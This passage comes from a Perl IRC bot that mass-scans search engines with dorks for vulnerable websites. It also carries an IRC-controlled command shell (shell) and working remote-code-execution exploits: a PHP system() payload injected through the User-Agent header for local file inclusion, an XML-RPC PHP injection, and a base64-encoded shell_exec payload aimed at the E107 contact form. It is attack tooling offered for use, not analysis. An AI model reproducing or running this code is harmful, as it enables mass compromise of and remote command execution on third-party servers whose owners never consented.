1377. &msg("$chan","$zerologo $engine <=> sHeLL <=> ".$vuln1." (SafeMode=$safe) (OS=$os) uid=$uid ");
1378. } else {
1379. &msg("$chan","$zerologo $engine <=> Cek dewe $vulner1 ");
1380. } sleep(2);
1381. }
1382. }
1383. } exit; }
1384. }
1385. }
1386. }
1387.  
1388. ##################################################################################
1389.  
1390. sub search_engine() {
1391. my (@total,@clean);
1392. my $chan = $_[0];
1393. my $bug = $_[1];
1394. my $dork = $_[2];
1395. my $engine = $_[3];
1396. my $logo = $_[4];
1397. if ($gps == 1) {
1398. if ($engine eq "JacKAE") { my @jackae = &jack1($dork."+site:ae"); push(@total,@jackae); }
1399. if ($engine eq "JacKAR") { my @jackar = &jack2($dork."+site:ar"); push(@total,@jackar); }
1400. if ($engine eq "JacKAT") { my @jackat = &jack3($dork."+site:at"); push(@total,@jackat); }
1401. if ($engine eq "JacKAU") { my @jackau = &jack4($dork."+site:au"); push(@total,@jackau); }
1402. if ($engine eq "JacKBR") { my @jackbr = &jack5($dork."+site:br"); push(@total,@jackbr); }
1403. if ($engine eq "JacKCA") { my @jackca = &jack1($dork."+site:ca"); push(@total,@jackca); }
1404. if ($engine eq "JacKCL") { my @jackcl = &jack2($dork."+site:cl"); push(@total,@jackcl); }
1405. if ($engine eq "JacKCN") { my @jackcn = &jack3($dork."+site:cn"); push(@total,@jackcn); }
1406. if ($engine eq "JacKCoM") { my @jackcom = &jack4($dork."+site:com"); push(@total,@jackcom); }
1407. if ($engine eq "JacKCZ") { my @jackcz = &jack5($dork."+site:cz"); push(@total,@jackcz); }
1408. if ($engine eq "JacKDE") { my @jackde = &jack1($dork."+site:de"); push(@total,@jackde); }
1409. if ($engine eq "JacKDK") { my @jackdk = &jack2($dork."+site:dk"); push(@total,@jackdk); }
1410. if ($engine eq "JacKES") { my @jackes = &jack3($dork."+site:es"); push(@total,@jackes); }
1411. if ($engine eq "JacKEU") { my @jackeu = &jack4($dork."+site:eu"); push(@total,@jackeu); }
1412. if ($engine eq "JacKFR") { my @jackfr = &jack5($dork."+site:fr"); push(@total,@jackfr); }
1413. if ($engine eq "JacKHU") { my @jackhu = &jack1($dork."+site:hu"); push(@total,@jackhu); }
1414. if ($engine eq "JacKID") { my @jackid = &jack2($dork."+site:id"); push(@total,@jackid); }
1415. if ($engine eq "JacKIL") { my @jackil = &jack3($dork."+site:il"); push(@total,@jackil); }
1416. if ($engine eq "JacKIN") { my @jackin = &jack4($dork."+site:in"); push(@total,@jackin); }
1417. if ($engine eq "JacKInfO") { my @jackinfo = &jack5($dork."+site:info"); push(@total,@jackinfo); }
1418. if ($engine eq "JacKIR") { my @jackir = &jack1($dork."+site:ir"); push(@total,@jackir); }
1419. if ($engine eq "JacKIT") { my @jackit = &jack2($dork."+site:it"); push(@total,@jackit); }
1420. if ($engine eq "JacKJP") { my @jackjp = &jack3($dork."+site:jp"); push(@total,@jackjp); }
1421. if ($engine eq "JacKKR") { my @jackkr = &jack4($dork."+site:kr"); push(@total,@jackkr); }
1422. if ($engine eq "JacKMX") { my @jackmx = &jack5($dork."+site:mx"); push(@total,@jackmx); }
1423. if ($engine eq "JacKMY") { my @jackmy = &jack1($dork."+site:my"); push(@total,@jackmy); }
1424. if ($engine eq "JacKNeT") { my @jacknet = &jack2($dork."+site:net"); push(@total,@jacknet); }
1425. if ($engine eq "JacKNL") { my @jacknl = &jack3($dork."+site:nl"); push(@total,@jacknl); }
1426. if ($engine eq "JacKOrG") { my @jackorg = &jack4($dork."+site:org"); push(@total,@jackorg); }
1427. if ($engine eq "JacKPH") { my @jackph = &jack5($dork."+site:ph"); push(@total,@jackph); }
1428. if ($engine eq "JacKPL") { my @jackpl = &jack1($dork."+site:pl"); push(@total,@jackpl); }
1429. if ($engine eq "JacKRO") { my @jackro = &jack2($dork."+site:ro"); push(@total,@jackro); }
1430. if ($engine eq "JacKRU") { my @jackru = &jack3($dork."+site:ru"); push(@total,@jackru); }
1431. if ($engine eq "JacKTH") { my @jackth = &jack4($dork."+site:th"); push(@total,@jackth); }
1432. if ($engine eq "JacKUA") { my @jackua = &jack5($dork."+site:ua"); push(@total,@jackua); }
1433. if ($engine eq "JacKUK") { my @jackuk = &jack1($dork."+site:uk"); push(@total,@jackuk); }
1434. if ($engine eq "JacKUS") { my @jackus = &jack2($dork."+site:us"); push(@total,@jackus); }
1435. if ($engine eq "JacKSI") { my @jacksi = &jack3($dork."+site:si"); push(@total,@jacksi); }
1436. if ($engine eq "JacKBE") { my @jackbe = &jack4($dork."+site:be"); push(@total,@jackbe); }
1437. if ($engine eq "JacKBIZ") { my @jackbiz = &jack5($dork."+site:biz"); push(@total,@jackbiz); }
1438. }
1439. if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }
1440. if ($gps2 == 1) {
1441. if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
1442. if ($engine eq "YaHoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
1443. if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
1444. if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
1445. if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }
1446. if ($engine eq "OnEt") { my @onet = &onet($dork); push(@total,@onet); }
1447. if ($engine eq "CLusTy") { my @clusty = &clusty($dork); push(@total,@clusty); }
1448. if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
1449. if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
1450. if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
1451. if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
1452. if ($engine eq "SeZNam") { my @seznam = &seznam($dork); push(@total,@seznam); }
1453. if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); }
1454. }
1455. @clean = &clean(@total);
1456. if ($silentmode == 0) {
1457. &msg("$chan","$logo $engine <=> Total: [".scalar(@total)."] Clean: [".scalar(@clean)."] "); }
1458. return @clean;
1459. }
1460. ##################################################################################
1461. sub isFound() {
1462. my $status = 0;
1463. my $link = $_[0];
1464. my $reqexp = $_[1];
1465. my $res = &get_content($link);
1466. if ($res =~ /$reqexp/) { $status = 1 }
1467. return $status;
1468. }
1469.  
1470. sub get_content() {
1471. my $url = $_[0];
1472. my $ua = LWP::UserAgent->new(agent => $uagent);
1473. $ua->timeout($timot);
1474. my $req = HTTP::Request->new(GET => $url);
1475. my $res = $ua->request($req);
1476. return $res->content;
1477. }
1478. ######################################### SEARCH ENGINE
1479.  
1480. sub jack1() {
1481. my @list;
1482. my $key = $_[0];
1483. for (my $i=0; $i<=1000; $i+=100){
1484. my $search = ($jack1.uri_escape($key)."&num=100&start=".$i);
1485. my $res = &search_engine_query($search);
1486. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
1487. my $link = $1;
1488. if ($link !~ /google/){
1489. my @grep = &links($link);
1490. push(@list,@grep);
1491. }
1492. }
1493. }
1494. return @list;
1495. }
1496.  
1497. sub jack2() {
1498. my @list;
1499. my $key = $_[0];
1500. for (my $i=0; $i<=1000; $i+=100){
1501. my $search = ($jack2.uri_escape($key)."&num=100&start=".$i);
1502. my $res = &search_engine_query($search);
1503. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
1504. my $link = $1;
1505. if ($link !~ /google/){
1506. my @grep = &links($link);
1507. push(@list,@grep);
1508. }
1509. }
1510. }
1511. return @list;
1512. }
1513.  
1514. sub jack3() {
1515. my @list;
1516. my $key = $_[0];
1517. for (my $i=0; $i<=1000; $i+=100){
1518. my $search = ($jack3.uri_escape($key)."&num=100&start=".$i);
1519. my $res = &search_engine_query($search);
1520. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
1521. my $link = $1;
1522. if ($link !~ /google/){
1523. my @grep = &links($link);
1524. push(@list,@grep);
1525. }
1526. }
1527. }
1528. return @list;
1529. }
1530.  
1531. sub jack4() {
1532. my @list;
1533. my $key = $_[0];
1534. for (my $i=0; $i<=1000; $i+=100){
1535. my $search = ($jack4.uri_escape($key)."&num=100&start=".$i);
1536. my $res = &search_engine_query($search);
1537. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
1538. my $link = $1;
1539. if ($link !~ /google/){
1540. my @grep = &links($link);
1541. push(@list,@grep);
1542. }
1543. }
1544. }
1545. return @list;
1546. }
1547.  
1548. sub jack5() {
1549. my @list;
1550. my $key = $_[0];
1551. for (my $i=0; $i<=1000; $i+=100){
1552. my $search = ($jack5.uri_escape($key)."&num=100&start=".$i);
1553. my $res = &search_engine_query($search);
1554. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
1555. my $link = $1;
1556. if ($link !~ /google/){
1557. my @grep = &links($link);
1558. push(@list,@grep);
1559. }
1560. }
1561. }
1562. return @list;
1563. }
1564.  
1565. sub google() {
1566. my @list;
1567. my $key = $_[0];
1568. for (my $i=0; $i<=1000; $i+=100){
1569. my $search = ("http://www.google.com/search?q=".uri_escape($key)."&num=100&filter=0&start=".$i);
1570. my $res = &search_engine_query($search);
1571. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
1572. my $link = $1;
1573. if ($link !~ /google/){
1574. my @grep = &links($link);
1575. push(@list,@grep);
1576. }
1577. }
1578. }
1579. return @list;
1580. }
1581.  
1582. sub walla() {
1583. my @list;
1584. my $key = $_[0];
1585. for ($b=0; $b<=100; $b+=1) {
1586. my $search = ("http://search.walla.co.il/?q=".uri_escape($key)."&type=text&page=".$b);
1587. my $res = &search_engine_query($search);
1588. while ($res =~ m/<a href=\"http:\/\/(.+?)\" title=/g) {
1589. my $link = $1;
1590. if ($link !~ /walla\.co\.il/){
1591. my @grep = &links($link);
1592. push(@list,@grep);
1593. }
1594. }
1595. }
1596. return @list;
1597. }
1598.  
1599. sub yahoo(){
1600. my @list;
1601. my $key = $_[0];
1602. for ($b=1; $b<=1000; $b+=10) {
1603. my $search = ("http://search.yahoo.com/search?p=".uri_escape($key)."&b=".$b);
1604. my $res = &search_engine_query($search);
1605. while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
1606. my $link = $1;
1607. if ($link !~ /yahoo\.com/){
1608. my @grep = &links($link);
1609. push(@list,@grep);
1610. }
1611. }
1612. }
1613. return @list;
1614. }
1615.  
1616. sub ask() {
1617. my @list;
1618. my $key = $_[0];
1619. for (my $i=1; $i<=1000; $i+=100) {
1620. my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
1621. my $res = &search_engine_query($search);
1622. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
1623. my $link = $1;
1624. if ($link !~ /ask\.com/){
1625. my @grep = &links($link);
1626. push(@list,@grep);
1627. }
1628. }
1629. }
1630. return @list;
1631. }
1632.  
1633. sub onet() {
1634. my @list;
1635. my $key = $_[0];
1636. my $b = 0;
1637. for ($b=1; $b<=400; $b+=10) {
1638. my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key));
1639. my $res = &search_engine_query($search);
1640. while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) {
1641. my $link = $1;
1642. if ($link !~ /onet|webcache|query/){
1643. my @grep = &links($link);
1644. push(@list,@grep);
1645. }
1646. }
1647. }
1648. return @list;
1649. }
1650.  
1651. sub clusty() {
1652. my @list;
1653. my $key = $_[0];
1654. my $b = 0;
1655. for ($b=10; $b<=200; $b+=10) {
1656. my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&");
1657. my $res = &search_engine_query($search);
1658. if ($res !~ /next/) {$b=100;}
1659. while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
1660. my $link = $1;
1661. if ($1 !~ /yippy\.com/){
1662. my @grep = &links($link);
1663. push(@list,@grep);
1664. }
1665. }
1666. }
1667. return @list;
1668. }
1669.  
1670. sub bing() {
1671. my @list;
1672. my $key = $_[0];
1673. for (my $i=1; $i<=400; $i+=10) {
1674. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i);
1675. my $res = &search_engine_query($search);
1676. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
1677. my $link = $1;
1678. if ($link !~ /google/) {
1679. my @grep = &links($link);
1680. push(@list,@grep);
1681. }
1682. }
1683. }
1684. return @list;
1685. }
1686.  
1687. sub sapo(){
1688. my @list;
1689. my $key = $_[0];
1690. for ($b=1; $b<=50; $b+=1) {
1691. my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".uri_escape($key)."&st=local");
1692. my $res = &search_engine_query($search);
1693. if ($res !~ m/Next/i) {$b=50;}
1694. while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
1695. my $link = $1;
1696. if ($1 !~ /\.sapo\.pt/){
1697. my @grep = &links($link);
1698. push(@list,@grep);
1699. }
1700. }
1701. }
1702. return @list;
1703. }
1704.  
1705. sub lycos() {
1706. my @list;
1707. my $key = $_[0];
1708. for ($b=0; $b<=50; $b+=1) {
1709. my $search = ("http://search.lycos.com/web?q=".uri_escape($key)."&pn=".$b);
1710. my $res = &search_engine_query($search);
1711. while ($res =~ m/title=\"http:\/\/(.*?)\"/g) {
1712. my $link = $1;
1713. if ($link !~ /lycos\.com/){
1714. my @grep = &links($link);
1715. push(@list,@grep);
1716. }
1717. }
1718. }
1719. return @list;
1720. }
1721.  
1722. sub uol() {
1723. my @list;
1724. my $key = $_[0];
1725. for ($b=0; $b<=1000; $b+=10) {
1726. my $search = ("http://busca.uol.com.br/web/?ref=homeuol&q=".uri_escape($key)."&start=".$b);
1727. my $res = &search_engine_query($search);
1728. if ($res =~ m/retornou nenhum resultado/i) {$b=500;}
1729. while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
1730. my $link = $1;
1731. if ($link !~ /uol\.com\.br|\/web/i){
1732. my @grep = &links($link);
1733. push(@list,@grep);
1734. }
1735. }
1736. }
1737. return @list;
1738. }
1739.  
1740. sub seznam() {
1741. my @list;
1742. my $key = $_[0];
1743. for ($b=1; $b<=300; $b+=20) {
1744. my $search = ("http://search.seznam.cz/?q=".uri_escape($key)."&count=20&from=".$b);
1745. my $res = &search_engine_query($search);
1746. while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
1747. my $link = $1;
1748. if ($link !~ /seznam\.cz|chytrevyhledavani\.cz|smobil\.cz|sklik\.cz/i){
1749. my @grep = &links($link);
1750. push(@list,@grep);
1751. }
1752. }
1753. }
1754. return @list;
1755. }
1756.  
1757. sub hotbot() {
1758. my @list;
1759. my $key = $_[0];
1760. for ($b=0; $b<=50; $b+=1) {
1761. my $search = ("http://www.hotbot.com/search/web?pn=".$b."&q=".uri_escape($key));
1762. my $res = &search_engine_query($search);
1763. if ($res =~ m/had no web result/i) {$b=50;}
1764. while ($res =~ m/href=\"http:\/\/(.+?)\" title=/g) {
1765. my $link = $1;
1766. if ($link !~ /hotbot\.com/){
1767. my @grep = &links($link);
1768. push(@list,@grep);
1769. }
1770. }
1771. }
1772. return @list;
1773. }
1774.  
1775. sub aol() {
1776. my @list;
1777. my $key = $_[0];
1778. for ($b=0; $b<=300; $b+=10) {
1779. my $search = ("http://search.aol.com/aol/search?q=".uri_escape($key)."&page=".$b);
1780. my $res = &search_engine_query($search);
1781. while ($res =~ m/href=\"http:\/\/(.*?)\"/g) {
1782. my $link = $1;
1783. if ($link !~ /aol\.com/){
1784. my @grep = &links($link);
1785. push(@list,@grep);
1786. }
1787. }
1788. }
1789. return @list;
1790. }
1791.  
1792. sub biglobe {
1793. my $key = $_[0];
1794. my @list;
1795. for ($b=1; $b<=500; $b+=10) {
1796. $num += $num;
1797. my $search = "http://cgi.search.biglobe.ne.jp/cgi-bin/search-st_lp2?start=".$b."&ie=utf8&num=".$num."&q=".uri_escape($key)."&lr=all";
1798. my $res = &search_engine_query($search);
1799. while ( $res =~ m/<a href=\"http:\/\/(.+?)\"/g ) {
1800. my $link = $1;
1801. if ($link !~ /biglobe/){
1802. my @grep = &links($link);
1803. push(@list,@grep);
1804. }
1805. }
1806. }
1807. return @list;
1808. }
1809.  
1810. #########################################
1811.  
1812. sub clean() {
1813. my @cln = ();
1814. my %visit = ();
1815. foreach my $element (@_) {
1816. $element =~ s/\/+/\//g;
1817. next if $visit{$element}++;
1818. push @cln, $element;
1819. }
1820. return @cln;
1821. }
1822.  
1823. sub links() {
1824. my @list;
1825. my $link = $_[0];
1826. my $host = $_[0];
1827. my $hdir = $_[0];
1828. $hdir =~ s/(.*)\/[^\/]*$/\1/;
1829. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
1830. $host .= "/";
1831. $link .= "/";
1832. $hdir .= "/";
1833. $host =~ s/\/\//\//g;
1834. $hdir =~ s/\/\//\//g;
1835. $link =~ s/\/\//\//g;
1836. push(@list,$link,$host,$hdir);
1837. return @list;
1838. }
1839.  
1840. sub search_engine_query() {
1841. my $url = $_[0];
1842. $url =~ s/http:\/\///;
1843. my $host = $url;
1844. my $query = $url;
1845. my $page = "";
1846. $host =~ s/href=\"?http:\/\///;
1847. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
1848. $query =~ s/$host//;
1849. if ($query eq "") { $query = "/"; }
1850. eval {
1851. my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
1852. my $sget = "GET $query HTTP/1.0\r\n";
1853. $sget .= "Host: $host\r\n";
1854. $sget .= "Accept: */*\r\n";
1855. $sget .= "User-Agent: $uagent\r\n";
1856. $sget .= "Connetion: Close\r\n\r\n";
1857. print $sock $sget;
1858. my @pages = <$sock>;
1859. $page = "@pages";
1860. close($sock);
1861. };
1862. return $page;
1863. }
1864.  
1865. #########################################
1866.  
1867. sub shell() {
1868. my $path = $_[0];
1869. my $cmd = $_[1];
1870. if ($cmd =~ /cd (.*)/) {
1871. chdir("$1") || &msg("$path","No such file or directory");
1872. return;
1873. }
1874. elsif ($pid = fork) { waitpid($pid, 0); }
1875. else { if (fork) { exit; } else {
1876. my @output = `$cmd 2>&1 3>&1`;
1877. my $c = 0;
1878. foreach my $output (@output) {
1879. $c++;
1880. chop $output;
1881. &msg("$path","$output");
1882. if ($c == 5) { $c = 0; sleep 3; }
1883. }
1884. exit;
1885. }}
1886. }
1887.  
1888. sub isAdmin() {
1889. my $status = 0;
1890. my $nick = $_[0];
1891. if ($nick eq $admin) { $status = 1; }
1892. return $status;
1893. }
1894.  
1895. sub msg() {
1896. return unless $#_ == 1;
1897. sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
1898. }
1899.  
1900. sub nick() {
1901. return unless $#_ == 0;
1902. sendraw("NICK $_[0]");
1903. }
1904. sub notice() {
1905. return unless $#_ == 1;
1906. sendraw("NOTICE $_[0] :$_[1]");
1907. }
1908.  
1909. sub cmdlfi() {
1910. my $browser = LWP::UserAgent->new;
1911. my $url = $_[0];
1912. my $cmd = $_[1];
1913. my $chan = $_[2];
1914. my $hie = "lobex<?system(\"$cmd 2> /dev/stdout\"); ?>byroe";
1915. $browser->agent("$hie");
1916. $browser->timeout(7);
1917. $response = $browser->get( $url );
1918. if ($response->content =~ /lobex(.*)byroe/s) {
1919. &msg("$chan","$lfilogo ".$1." ");
1920. } else {
1921. &msg("$chan","$lfilogo No Output ");
1922. }
1923. }
1924.  
1925. sub cmdxml() {
1926. my $jed = $_[0];
1927. my $dwa = $_[1];
1928. my $chan = $_[2];
1929. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
1930. $exploit = "<?xml version=\"1.0\"?><methodCall>";
1931. $exploit .= "<methodName>test.method</methodName>";
1932. $exploit .= "<params><param><value><name>',''));";
1933. $exploit .= "echo'bamby';system('".$dwa."');echo'solo';exit;/*</name></value></param></params></methodCall>";
1934. my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
1935. if ($response->content =~ /bamby(.*)solo/s) {
1936. &msg("$chan","$xmllogo $1 ");
1937. } else {
1938. &msg("$chan","$xmllogo No Output ");
1939. }
1940. }
1941.  
1942. sub cmde107() {
1943. my $path = $_[0];
1944. my $code = $_[1];
1945. my $chan = $_[2];
1946. my $codecmd = encode_base64($code);
1947. my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"));';
1948. my $req = HTTP::Request->new(POST => $path);
1949. $req->content_type('application/x-www-form-urlencoded');
1950. $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
1951. my $ua = LWP::UserAgent->new(agent => $uagent);
1952. $ua->timeout(7);
1953. my $res = $ua->request($req);
1954. my $data = $res->as_string;
1955. if ( $data =~ /ByroeNet(.*)/ ){
1956. $mydata = $1;
1957. &msg("$chan","(E107) $mydata ");
1958. }
1959. else { &msg("$chan","(E107) No Output "); }